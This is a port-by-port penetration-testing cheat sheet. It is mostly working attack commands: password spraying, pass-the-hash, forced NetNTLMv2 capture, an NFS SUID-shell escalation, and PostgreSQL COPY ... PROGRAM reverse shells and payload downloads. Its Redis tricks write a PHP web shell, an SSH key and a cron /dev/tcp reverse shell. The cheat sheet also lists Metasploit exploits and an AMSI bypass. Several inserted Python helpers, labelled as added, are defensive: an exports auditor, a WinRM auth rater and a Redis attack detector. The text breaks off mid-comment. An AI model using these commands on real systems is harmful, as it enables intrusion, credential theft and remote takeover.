ike-scan -A --sport=5500 --idtype=3 --id administrator@example.com --pskcrack=ike_psk_t3.txt <ip>
ike-scan -A --sport=5500 --idtype=11 --id example --pskcrack=ike_psk_t11.txt <ip>
ike-scan -A --sport=5500 --idtype=1 --id <ip> --pskcrack=ike_psk_t1.txt <ip>
ike-scan -A --sport=5500 --idtype=2 --id example.com --pskcrack=ike_psk_t2.txt <ip>
- --sport=5500 is optional; only use it if UDP 500 is already in use on your local system.
636 TCP - LDAPS
873 TCP - rsync
Commands
| Action | Command |
|---|---|
| Enumerate shares (daemon) | rsync <ip>:: |
| Enumerate shares (alt URL) | rsync rsync://<ip>/ |
| List files in a share | rsync <ip>::<share> |
| Download remote file (daemon) | rsync rsync://<ip>/<share>/<remote_file> <local_dir>/ |
| Download remote directory (daemon) | rsync -av rsync://<ip>/<share>/<remote_dir>/ <local_dir>/ |
| Download with custom port/user (daemon) | rsync -av rsync://<user>@<ip>:<port>/<share>/ <local_dir>/ |
| Upload local file (daemon) | rsync <local_file> rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local directory (daemon) | rsync -av <local_dir>/ rsync://<user>@<ip>/<share>/<remote_dir>/ |
| Upload local .ssh directory (example) | rsync -av ./.ssh/ rsync://<ip>/<share>/ |
| Over SSH on non-22 port | rsync -a -e "ssh -p <port>" <local_dir>/ <user>@<ip>:<remote_dir>/ |
1433 TCP – Microsoft SQL
- Microsoft SQL Server default service (SQL and Windows authentication). Good resource: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Commands
| Action | Command |
|---|---|
| Run shell command | EXEC xp_cmdshell '<command>'; |
| Enable xp_cmdshell | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; |
| View databases | SELECT name FROM master.dbo.sysdatabases; |
| Select/use a database | USE <db>; |
| Get table names | SELECT * FROM <db>.INFORMATION_SCHEMA.TABLES; or SELECT name FROM sysobjects WHERE xtype = 'U'; |
| List linked servers | EXEC sp_linkedservers; or SELECT * FROM sys.servers; |
| List users | SELECT sp.name AS login, sp.type_desc AS login_type, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN 'Disabled' ELSE 'Enabled' END AS status FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ('G','R') ORDER BY sp.name; |
| Create user with sysadmin privs | CREATE LOGIN <username> WITH PASSWORD = '<password>'; EXEC sp_addsrvrolemember '<username>', 'sysadmin'; |
| View password hashes | SELECT name, password_hash FROM master.sys.sql_logins; |
| View permissions | SELECT * FROM fn_my_permissions(NULL, 'SERVER'); |
nxc
| Action | Command |
|---|---|
| Spray passwords (SQL auth) | nxc mssql <target_or_cidr> -u <user_or_list> -p <pass_or_list> |
| Windows auth login | nxc mssql <ip> -d <domain> -u <user> -p '<pass>' |
| Windows auth with NTLM hash | nxc mssql <ip> -d <domain> -u <user> -H <NTHASH> |
| Run OS command via xp_cmdshell | nxc mssql <ip> -u <user> -p '<pass>' -x "whoami" |
| Run an ad-hoc SQL query | nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT @@version" |
| Check if xp_cmdshell is enabled | nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name='xp_cmdshell'" |
| Enable xp_cmdshell | nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;" |
| Trigger SMB auth (capture NetNTLMv2) | nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC master..xp_dirtree '\\\\<attacker_ip>\\<share>'" |
| Specify non-default port | nxc mssql <ip> --port <port> -u <user> -p '<pass>' |
impacket-mssqlclient
| Action | Command |
|---|---|
| Login (SQL auth) | mssqlclient <user>:<password>@<ip> |
| Login (Windows auth) | mssqlclient <domain>/<user>:<password>@<ip> -windows-auth |
| Enable xp_cmdshell (helper) | enable_xp_cmdshell |
| Run shell command (helper) | xp_cmdshell <command> |
| Enable xp_cmdshell (T-SQL one-liner) | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; |
| Run shell command (T-SQL) | EXEC xp_cmdshell '<command>'; |
Attack Path
- Capture the SQL service account's SMB authentication
  - Start Responder on tun0
  - Make the server authenticate to Responder and capture the NetNTLMv2 hash:
    EXEC master.dbo.xp_dirtree '\\<attacker_ip>\<share>';
  - Crack the captured NetNTLMv2 hash:
    hashcat -m 5600 <hash_file> <wordlist>
1521 TCP – Oracle TNS Listener
- Oracle Transparent Network Substrate (TNS) listener for Oracle Database. Handles client connection negotiation and service/SID routing; common target for SID discovery and auth brute force.
Commands
| Action | Command |
|---|---|
| View privileges | SELECT * FROM session_privs; SELECT * FROM user_role_privs; |
| Read file (UTL_FILE) | See snippet below |
| Write file (UTL_FILE) | See snippet below |
| Run last PL/SQL block | / |
| Enable output | SET SERVEROUTPUT ON |
Read a File
declare
f utl_file.file_type;
s varchar(400);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
Write a File
declare
f utl_file.file_type;
s varchar(5000) := '<insert text to write>';
begin
f := utl_file.fopen('/inetpub/wwwroot', '<file to write>', 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
odat
- Requires sqlplus installed and reachable in $PATH.
| Action | Command |
|---|---|
| Enumerate SIDs | odat sidguess -s <ip> -p <port> |
| Brute-force credentials | odat passwordguesser -s <ip> -d <service> -U <user_or_list> -P <pass_or_list> |
| All-in-one checks (authenticated) | odat all -s <ip> -d <service> -U <user> -P <pass> |
| Authenticate as SYSDBA (flag) | --sysdba |
| Upload file via DBMS_ADVISOR | odat dbmsadvisor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
| Upload file via DBMS_XSLPROCESSOR | odat dbmsxslprocessor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file> |
metasploit
| Action | Command |
|---|---|
| SID brute | msfconsole -q -x "use auxiliary/scanner/oracle/sid_brute; set RHOSTS <ip>; set RPORT 1521; run; exit" |
| Login brute | msfconsole -q -x "use auxiliary/scanner/oracle/oracle_login; set RHOSTS <ip>; set RPORT 1521; set SID <sid>; run; exit" |
sqlplus
| Action |
Command |
| Login |
sqlplus64 <user>/<password>@<ip>:<port>/<service> |
| Login as SYSDBA |
sqlplus64 <user>/<password>@<ip>:<port>/<service> as sysdba |
Resources:
- Oracle DB exploit guide - blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
- Metasploit for Oracle - blog.zsec.uk/msforacle/
1801 TCP - MSMQ
- Can be affected by the QueueJumper vulnerability, which allows RCE. Exploitation may result in a DoS of the service, causing issues with email.
2049 TCP / mountd (NFS)
- NFS server daemon (nfsd) for Unix/Linux file sharing. NFSv4 typically uses only 2049; NFSv3 also relies on additional RPC services (e.g., mountd, lock/quotas) discovered via rpcbind on 111.
| Action | Command |
|---|---|
| Show the NFS server’s export list | showmount -e <target> |
| Show NFS shares with nmap | nmap -sV --script=nfs-showmount <target> |
| Mount an NFS share | mount -o rw,vers=2 <target>:<share> <local_directory> |
- NFS share information is stored in /etc/exports
Root Squashing
When connecting to an NFS share, if root squashing is enabled, then the owner of the files in the share will be set to "nobody".
1. On victim machine
Check /etc/exports to see if no_root_squash is listed. If so, root squashing is disabled.
2. On attack machine
Show NFS share availability:
showmount -e <target ip>
Confirm NFS share is available for remote mounting:
mkdir /tmp/nfs
mount -o rw,vers=2 <target>:<share> /tmp/nfs
sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
3. On victim machine
Execute payload:
/tmp/shell.elf
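The "What to look for" list in the 111 TCP section and step 1 of Root Squashing above both come down to reading /etc/exports. The Python below is an added example, not from the original page: it parses exports(5) syntax (comments, backslash continuations, per-client option lists, a bare (opts) that applies to every host) and reports the settings the list calls out: world or wide-subnet exports, no_root_squash, insecure, and sensitive paths. The sample file is constructed for a hypothetical server, and the sensitive-path hints are a heuristic of this example.

```python
import ipaddress
import re

# Constructed sample /etc/exports for a hypothetical server (not from the original page).
SAMPLE_EXPORTS = """\
# backups for the whole network
/srv/backups      *(rw,sync,no_root_squash)
/home             10.0.0.0/8(rw,sync) 192.168.10.0/24(ro)
/srv/www          192.168.10.0/24(ro,sync,root_squash)
/srv/secure       192.168.10.5(rw,sec=krb5p,sync) \\
                  192.168.10.6(rw,sec=krb5p,sync)
/var/nfs/pub      *(ro,insecure,all_squash)
"""

CLIENT_RE = re.compile(r"([^(]*)(?:\(([^)]*)\))?")
SENSITIVE_HINTS = ("/home", "/root", "/etc", "backup", "secret")  # heuristic of this example


def parse_exports(text):
    """Return [(path, [(client, {options}), ...]), ...] from exports(5) syntax,
    honouring '#' comments and backslash line continuations. A bare '(opts)'
    with no host means every host, which is how exportfs treats it."""
    exports = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        clients = []
        for token in rest.split():
            m = CLIENT_RE.fullmatch(token)
            if not m:
                continue  # malformed token, e.g. unbalanced parenthesis
            host = m.group(1) or "*"
            opts = set(m.group(2).split(",")) if m.group(2) else set()
            clients.append((host, opts))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """List the risky settings the 111 TCP section says to look for."""
    findings = []
    for path, clients in parse_exports(text):
        if any(hint in path for hint in SENSITIVE_HINTS):
            findings.append(f"{path}: sensitive path exported")
        for host, opts in clients:
            access = "rw" if "rw" in opts else "ro"
            if host == "*" or "*" in host or "?" in host:
                findings.append(f"{path}: exported {access} to the world ({host})")
            else:
                try:
                    net = ipaddress.ip_network(host, strict=False)
                    if net.version == 4 and net.prefixlen < 24:
                        findings.append(f"{path}: exported {access} to wide subnet {net}")
                except ValueError:
                    pass  # hostname or @netgroup: width cannot be judged here
            if "no_root_squash" in opts:
                findings.append(f"{path}: no_root_squash for {host} (client root = server root)")
            if "insecure" in opts:
                findings.append(f"{path}: insecure for {host} (requests from unprivileged ports accepted)")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

The /srv/secure export, restricted to two hosts and requiring sec=krb5p, produces no findings, which is the configuration the Kerberized-NFS note in the 111 section describes; the world-writable backups export with no_root_squash is exactly the setup the Root Squashing steps above abuse.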
showmount
| Action | Command |
|---|---|
| Show exported paths | showmount -e <ip> |
| Show clients using exports | showmount -a <ip> |
mount
| Action | Command |
|---|---|
| Create local mount point | sudo mkdir -p /mnt/<dir> |
| Mount NFSv3 export | sudo mount -t nfs <ip>:<export> /mnt/<dir> |
| Mount NFSv4 export | sudo mount -t nfs4 <ip>:/<export> /mnt/<dir> |
| Unmount (forced/lazy) | sudo umount -lf /mnt/<dir> |
nmap (NFS)
| Action | Command |
|---|---|
| Enumerate exports via NSE | nmap -p 111,2049 --script nfs-showmount <ip> |
| List files on export | nmap -p 2049 --script nfs-ls --script-args nfs-ls.root=/,nfs.version=3 <ip> |
| Get filesystem stats | nmap -p 2049 --script nfs-statfs <ip> |
3000 TCP – Express.js / Node (HTTP)
- Common development HTTP port for Node.js apps (Express, Next.js, React dev server).
- 9229 TCP – Node.js Inspector (remote debugging)
3268 TCP - LDAP
- LDAP (Global Catalog): forest-wide, read-only search endpoint on GC servers; returns only attributes in the Partial Attribute Set. Use 389/636 on a domain DC for full attributes or modifications. LDAPS to GC: 3269/TCP.
3269 TCP - LDAPS
- Forest-wide LDAP over SSL/TLS to GC servers. Supports searches without referrals but returns only attributes in the Partial Attribute Set. For full attributes or modifications, query a domain DC on 636 (LDAPS) or 389 (LDAP).
3306 TCP – MySQL
- MySQL server default TCP port (SQL protocol over TCP).
Attack Paths
RCE via UDF upload
- RCE via UDF upload: place a malicious shared library in plugin_dir and CREATE FUNCTION ... SONAME ...; invoking the UDF can execute OS commands.
- Requirements: ability to write to plugin_dir (directly or via SELECT ... INTO DUMPFILE) and privilege to create UDFs (CREATE FUNCTION).
- Notes: library must match server OS/architecture; secure_file_priv may restrict file writes; UDFs persist until DROP FUNCTION.
- Mitigations: lock down plugin_dir, restrict CREATE FUNCTION, set secure_file_priv, avoid running mysqld as root.
| Action | Command |
|---|---|
| Show plugin directory | SHOW VARIABLES LIKE 'plugin_dir'; |
| Verify privileges | SHOW GRANTS; |
| List installed UDFs (legacy) | SELECT * FROM mysql.func; |
| Create UDF from library | CREATE FUNCTION <udf_name> RETURNS INTEGER SONAME '<library.so\|dll>'; |
| Use UDF (example) | SELECT <udf_name>('<arg>'); |
| Drop UDF | DROP FUNCTION <udf_name>; |
Commands
| Action | Command |
|---|---|
| Show variables | SHOW VARIABLES; |
| Show user privileges | SHOW GRANTS; |
| Show individual variable | SELECT @@<variable>; |
| Show plugins directory | SHOW VARIABLES LIKE '%plugin_dir%'; |
| Show databases | SHOW DATABASES; |
| Select/use a database | USE <database>; |
| Show server version | SELECT @@version; |
| Show current user | SELECT USER(); |
| List tables in a DB | SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='<db>'; |
| List columns for a table | SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TableName'; |
| Select username and password columns | SELECT username, password FROM TableName; |
| Show all columns/records in users | SELECT * FROM users; |
| Show username where id=1 | SELECT username FROM users WHERE id=1; |
| Load data from local file into table | LOAD DATA LOCAL INFILE '/path/file.csv' INTO TABLE <table> FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n'; |
| Change cell contents | UPDATE <Table> SET <Column>='<Value>' WHERE <Column>='<Value>'; |
| Create database | CREATE DATABASE <name>; |
| Insert row into table | INSERT INTO <table>(<col1>,<col2>) VALUES ('<val1>','<val2>'); |
| Create user | CREATE USER '<username>'@'<host>' IDENTIFIED BY '<password>'; |
| Grant all permissions to user | GRANT ALL ON <database>.* TO '<user>'@'<host>'; |
| Limit results | SELECT * FROM <table> LIMIT <number>; |
| Set binary variable | SET @<var> = 0x<hex>; |
| Output variable to server file | SELECT @<var> INTO DUMPFILE '/path/something.bin'; |
| Info about tables/databases | SELECT * FROM INFORMATION_SCHEMA.TABLES; |
| Check column collation | SELECT COLLATION_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<table>' AND COLUMN_NAME='<column>'; |
| Select with explicit collation | SELECT <column> COLLATE <collation> FROM <table>; |
mysql
| Action | Command |
|---|---|
| Connect (TCP) | mysql --host=<ip> --port=3306 --user=<user> -p<password> |
| Connect and run one query | mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT VERSION();" |
| List databases | mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW DATABASES;" |
| List tables in a DB | mysql -h <ip> -P 3306 -u <user> -p<password> -e "USE <db>; SHOW TABLES;" |
| Current user | mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT USER();" |
| Check secure_file_priv | mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW VARIABLES LIKE 'secure_file_priv';" |
| Read server file (LOAD_FILE) | mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT LOAD_FILE('/etc/passwd');" |
| Enable LOCAL INFILE (client) | mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> |
| Import CSV via LOCAL INFILE | mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> -e "LOAD DATA LOCAL INFILE 'data.csv' INTO TABLE <db>.<table> FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';" |
mysqldump
| Action | Command |
|---|---|
| Dump one database | mysqldump -h <ip> -P 3306 -u <user> -p<password> <db> > dump.sql |
| Dump all databases | mysqldump -h <ip> -P 3306 -u <user> -p<password> --all-databases > all.sql |
nmap (MySQL NSE)
| Action | Command |
|---|---|
| Fingerprint and basic enum | nmap -sV -p 3306 --script mysql-enum <ip> |
| Enumerate users (needs creds) | nmap -p 3306 --script mysql-users --script-args mysqluser=<user>,mysqlpass=<pass> <ip> |
| Audit with policy file | nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=<user>,mysql-audit.password=<pass>,mysql-audit.filename=/path/policy.nse <ip> |
Resources
3389 TCP – RDP
- Windows Remote Desktop Protocol. Prefer xfreerdp (actively maintained; supports NLA/TLS, clipboard/drive redirection). rdesktop is legacy and may fail against modern NLA setups.
nxc
- Credential validation against RDP/NLA without opening a GUI session (use
xfreerdp for interactive access).
| Action |
Command |
| Check login (password spray) |
nxc rdp <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc rdp <ip> -d <domain> -u <user> -p '<pass>' |
| Pass-the-hash |
nxc rdp <ip> -u <user> -H <NTHASH> |
| Kerberos (ccache) |
nxc rdp <fqdn> -k |
| Non-default port |
nxc rdp <ip> --port <port> -u <user> -p '<pass>' |
| Show NLA status in host banner |
nxc rdp <target> -u <user> -p '<password>' |
| Prove NLA disabled (unauth screenshot of login UI) |
nxc rdp <target> --nla-screenshot |
| Capture desktop after auth (evidence) |
nxc rdp <target> -u <user> -p '<password>' --screenshot --screentime 10 |
| Sweep a range for NLA-off hosts (save screenshots) |
nxc rdp <cidr> --nla-screenshot --res 1280x720 |
xfreerdp
- RDP client, preferred over rdesktop.
- Install xfreerdp v2: sudo apt-get install -y freerdp2-x11
- Install xfreerdp v3: sudo apt-get install -y freerdp3-x11
| Action |
Command |
| Connect |
xfreerdp /v:<ip>:3389 /u:<user> /p:'<pass>' /cert:ignore |
| Domain auth |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /d:<domain> /cert:ignore |
| Fullscreen |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /f |
| Dynamic resolution |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /dynamic-resolution |
| Map local folder |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /drive:loot,<local_path> |
| Enable clipboard |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' +clipboard |
| Force TLS (no NLA) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:tls /cert:ignore |
| Force Standard RDP (legacy) |
xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:rdp |
rdesktop
| Action |
Command |
| Connect |
rdesktop -u <user> -p '<pass>' <ip> |
| Domain auth |
rdesktop -u <user> -p '<pass>' -d <domain> <ip> |
| Fullscreen |
rdesktop -f -u <user> -p '<pass>' <ip> |
| Set resolution |
rdesktop -g 1920x1080 -u <user> -p '<pass>' <ip> |
| Map local folder |
rdesktop -r disk:loot=<local_path> -u <user> -p '<pass>' <ip> |
3690 TCP - SVN
svn
| Action |
Command |
| List repository contents |
svn list svn://<ip> |
| Checkout working copy |
svn checkout svn://<ip> |
| Show commit history |
svn log |
| Update to a specific revision |
svn update -r <revision> |
5432 TCP - PostgreSQL
Commands
| Action |
Command |
| Connect to database |
psql -h <ip> -U <user> -d <db>
psql postgresql://<username>:<password>@<host> |
| List databases |
\list |
| Use/switch database |
\c <db> |
| List tables |
\d |
| Get user roles (verbose) |
\du+ |
| Check if current user is superuser |
SELECT rolsuper FROM pg_roles WHERE rolname = current_user; |
| Browse server directory |
SELECT pg_ls_dir('./'); |
| List /etc directory |
SELECT pg_ls_dir('/etc'); |
| Read server file contents |
SELECT pg_read_file('/etc/passwd', 0, 100000); |
| Copy file contents into table |
CREATE TABLE <table>(content text); COPY <table> FROM '/path/to/file'; SELECT * FROM <table>; |
| Copy file into TEMP table (alt) |
CREATE TEMP TABLE <table>(content text); COPY <table> FROM $$C:\\path\\file.txt$$; SELECT content FROM <table>; DROP TABLE <table>; |
| Dump table to server file |
COPY <table> TO '/path/to/file.txt'; |
| Write literal text to file |
COPY (SELECT $$<text>$$) TO '/path/to/file.txt'; |
| Base64 decode → file (bytes) |
COPY (SELECT decode($$dGVzdGluZzEyMw==$$, $$base64$$)) TO $$C:\\test.bin$$; |
| Base64 decode → UTF-8 text file |
COPY (SELECT convert_from(decode($$dGVzdGluZzEyMw==$$, $$base64$$), $$utf-8$$)) TO $$C:\\test.txt$$; |
Attack Paths
Code Execution — C UDF/DLL
- Load a native library and expose an exported C symbol as a SQL function, then call it.
- Prereqs: Superuser (or equivalent), server account can read the library file, correct bitness (x64 vs x86).
- Paths: Absolute paths work; otherwise the file must be in dynamic_library_path.
RCE — COPY ... PROGRAM (built-in, privilege-gated)
- Built-in PostgreSQL feature, not an exploit. If you have superuser (or the role pg_execute_server_program), the server can run OS commands and pipe stdout into a table.
- Minimal footprint: use a TEMP table so artifacts drop at session end.
| Action |
Command |
| Verify privilege |
SELECT current_user, rolsuper FROM pg_roles WHERE rolname = current_user; |
| Create temp results table |
CREATE TEMP TABLE cmd_exec(cmd_output text); |
| PoC (Linux) |
COPY cmd_exec FROM PROGRAM 'whoami'; |
| PoC (Windows) |
COPY cmd_exec FROM PROGRAM 'cmd.exe /c whoami'; |
| Read output |
SELECT * FROM cmd_exec; |
| Reverse shell (Linux, if nc present) |
COPY cmd_exec FROM PROGRAM 'nc -n <ip> <port> -e /bin/bash'; |
| Download file (Linux) |
COPY cmd_exec FROM PROGRAM 'curl -s -o /tmp/payload http://<ip>/payload'; |
| Download file (Windows) |
COPY cmd_exec FROM PROGRAM 'powershell -NoP -W Hidden -C "iwr http://<ip>/payload -OutFile C:\Windows\Temp\payload.exe"'; |
- Commands run on the DB host as the PostgreSQL service account; no interactive prompts.
- Managed/cloud PostgreSQL often disables PROGRAM. Use absolute paths if PATH is constrained.
5985 TCP – WinRM
- Windows Remote Management (WS-Management over HTTP). Enables remote command execution and PowerShell remoting. Default auth is Negotiate (Kerberos/NTLM) with message-level encryption; Basic over HTTP indicates weak configuration. Prefer 5986/HTTPS in production.
curl
| Action |
Command |
| Fingerprint endpoint (401 expected) |
curl -sI http://<ip>:5985/wsman |
| Check auth methods |
curl -sI http://<ip>:5985/wsman | grep -i 'www-authenticate' |
nmap
| Action |
Command |
| Nmap WinRM probe |
nmap -p 5985 --script http-windows-remote-management <ip> |
nxc
| Action |
Command |
| Validate creds / spray |
nxc winrm <target_or_cidr> -u <user_or_list> -p '<pass_or_list>' |
| Domain auth |
nxc winrm <ip> -d <domain> -u <user> -p '<pass>' |
| Kerberos (ccache) |
nxc winrm <fqdn> -k |
| Pass-the-hash |
nxc winrm <ip> -u <user> -H <NTHASH> |
| Run CMD |
nxc winrm <ip> -u <user> -p '<pass>' -x "whoami /all" |
| Run PowerShell |
nxc winrm <ip> -u <user> -p '<pass>' -X "Get-LocalUser" |
evil-winrm (interactive)
| Action |
Command |
| Shell (HTTP) |
evil-winrm -i <ip> -u <user> -p '<pass>' |
| Shell (HTTPS 5986) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' |
| Shell with client cert (HTTPS) |
evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' -k <private_key> -c <certificate> |
| Show menu (in-session) |
menu |
| AMSI bypass (in-session) |
Bypass-4MSI |
| Run local EXE in-memory (in-session) |
Invoke-Binary <path_to_local_exe> |
| Upload file (in-session) |
upload <local_path> <remote_path> |
| Download file (in-session) |
download <remote_path> <local_path> |
Notes
- Basic over HTTP works only if the host is configured with Basic=true and AllowUnencrypted=true; if so, flag as a high-risk misconfiguration. Prefer 5986/TLS.
- WinRM typically restricted to local Administrators; successful auth is strong lateral-movement evidence.
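Rating what a listener advertises, as an added example that is not part of the original notes: it parses the 401 headers the curl -sI check above returns and flags the Basic-over-HTTP case described in the notes. The two responses are constructed samples, and the realm value is an assumption.

```python
def auth_schemes(raw_response):
    """Collect the scheme names from every WWW-Authenticate header line."""
    schemes = []
    for line in raw_response.splitlines():
        name, sep, value = line.partition(":")
        tokens = value.split()
        if sep and tokens and name.strip().lower() == "www-authenticate":
            schemes.append(tokens[0].lower())   # "Basic realm=..." -> "basic"
    return schemes

def assess(url, raw_response):
    """Return (risk, reason). Basic over plain HTTP is the high-risk case from
    the notes: the host must have Basic=true and AllowUnencrypted=true."""
    schemes = set(auth_schemes(raw_response))
    if "basic" in schemes and url.lower().startswith("http://"):
        return ("high", "Basic auth offered over HTTP (cleartext credentials)")
    if "basic" in schemes:
        return ("medium", "Basic auth offered over HTTPS (password reaches server)")
    if schemes & {"negotiate", "kerberos"}:
        return ("expected", "Negotiate/Kerberos only")
    return ("unknown", "no WWW-Authenticate header; not a WinRM 401?")

# Constructed 401 responses in the shape the curl -sI check returns
HARDENED = ("HTTP/1.1 401 \r\nServer: Microsoft-HTTPAPI/2.0\r\n"
            "WWW-Authenticate: Negotiate\r\nContent-Length: 0\r\n\r\n")
WEAK = ("HTTP/1.1 401 \r\nServer: Microsoft-HTTPAPI/2.0\r\n"
        "WWW-Authenticate: Negotiate\r\nWWW-Authenticate: Basic realm=\"WSMAN\"\r\n"
        "Content-Length: 0\r\n\r\n")
```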
5986 TCP – WinRM (HTTPS)
- WinRM over TLS; same API as 5985 with transport encryption. Common issues: self-signed/expired certs, CN/SAN mismatch, Basic enabled.
See 5985 TCP – WinRM
6379 TCP – Redis
- In-memory key/value store.
Attack Paths
Arbitrary File Write (CONFIG + SAVE) → Web shell / SSH key / Cron
- Primitive: CONFIG SET dir <target_dir> → CONFIG SET dbfilename <file> → SET … → SAVE.
Web shell (PHP)
| Action |
Command |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <web_root> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename shell.php |
| Write PHP payload to key |
redis-cli -h <ip> SET test "<?php system($_REQUEST['cmd']); ?>" |
| Persist to disk |
redis-cli -h <ip> SAVE |
SSH authorized_keys
| Action |
Command |
| Stage public key locally |
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt |
| Upload staged key into Redis |
cat foo.txt | redis-cli -h <ip> -x SET crackit |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir <writable_home_dir> |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename authorized_keys |
| Persist to disk |
redis-cli -h <ip> SAVE |
Cron reverse shell
| Action |
Command |
| Clear DB (optional) |
redis-cli -h <ip> FLUSHALL |
| Stage crontab entry key |
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1\n\n" | redis-cli -h <ip> -x SET 1 |
| Set target directory |
redis-cli -h <ip> CONFIG SET dir /var/spool/cron/ |
| Set output filename |
redis-cli -h <ip> CONFIG SET dbfilename root |
| Persist to disk |
redis-cli -h <ip> SAVE |
Module-Based RCE
| Action |
Command |
| Load module |
redis-cli -h <ip> MODULE LOAD <path_to_module> |
| Execute command |
redis-cli -h <ip> sys.exec "whoami" |
| Reverse shell |
redis-cli -h <ip> sys.rev <ip> <port> |
Rogue Replication → Module-Based RCE (Automated)
| Action |
Command |
| Metasploit (unauth) |
msfconsole -q -x "use exploit/linux/redis/redis_unauth_exec; set RHOSTS <ip>; set RPORT 6379; run; exit" |
| Metasploit (auth) |
msfconsole -q -x "use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS <ip>; set RPORT 6379; set PASSWORD <password>; run; exit" |
| Build module (redis-rogue-getshell) |
cd RedisModulesSDK && make |
| Rogue master → exec cmd |
python3 redis-master.py -r <ip> -p 6379 -L <lhost> -P <lport> -f RedisModulesSDK/exp.so -c "id" |
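The detection side of the three attack paths above (CONFIG SET dir/dbfilename + SAVE, MODULE LOAD, rogue replication), as an added example that is not part of the original notes: a small RESP parser plus a state machine run over a captured client command stream, e.g. from a proxy log or pcap payload. The stream below is constructed for the demo, with the key value replaced by a placeholder.

```python
def encode(*args):
    """Encode one client command as a RESP array of bulk strings."""
    body = b"".join(b"$%d\r\n%s\r\n" % (len(a.encode()), a.encode()) for a in args)
    return b"*%d\r\n" % len(args) + body

def parse_resp(stream):
    """Yield every RESP array in a captured byte stream as a list of str."""
    pos = 0
    while pos < len(stream):
        if stream[pos:pos + 1] != b"*":
            raise ValueError("expected RESP array at offset %d" % pos)
        end = stream.index(b"\r\n", pos)
        count, pos, args = int(stream[pos + 1:end]), end + 2, []
        for _ in range(count):
            end = stream.index(b"\r\n", pos)       # "$<len>\r\n<payload>\r\n"
            length = int(stream[pos + 1:end])
            pos = end + 2
            args.append(stream[pos:pos + length].decode("utf-8", "replace"))
            pos += length + 2
        yield args

def detect(stream):
    """Flag the file-write primitive (runtime CONFIG SET dir/dbfilename then
    SAVE), MODULE LOAD and replication redirection. Returns findings."""
    cfg, findings = {}, []
    for argv in parse_resp(stream):
        if not argv:
            continue
        cmd, sub = argv[0].upper(), (argv[1].upper() if len(argv) > 1 else "")
        if cmd == "CONFIG" and sub == "SET" and len(argv) == 4 \
                and argv[2].lower() in ("dir", "dbfilename"):
            cfg[argv[2].lower()] = argv[3]        # remember what the client changed
        elif cmd in ("SAVE", "BGSAVE") and cfg:
            findings.append("RDB written to %s/%s after runtime CONFIG SET"
                            % (cfg.get("dir", "<unchanged>"), cfg.get("dbfilename", "<unchanged>")))
        elif cmd == "MODULE" and sub == "LOAD" and len(argv) >= 3:
            findings.append("MODULE LOAD %s (native code loaded into redis)" % argv[2])
        elif cmd in ("SLAVEOF", "REPLICAOF") and len(argv) == 3 and sub != "NO":
            findings.append("replication redirected to %s:%s" % (argv[1], argv[2]))
    return findings

# Constructed sample: the web-shell write sequence from the notes, then a
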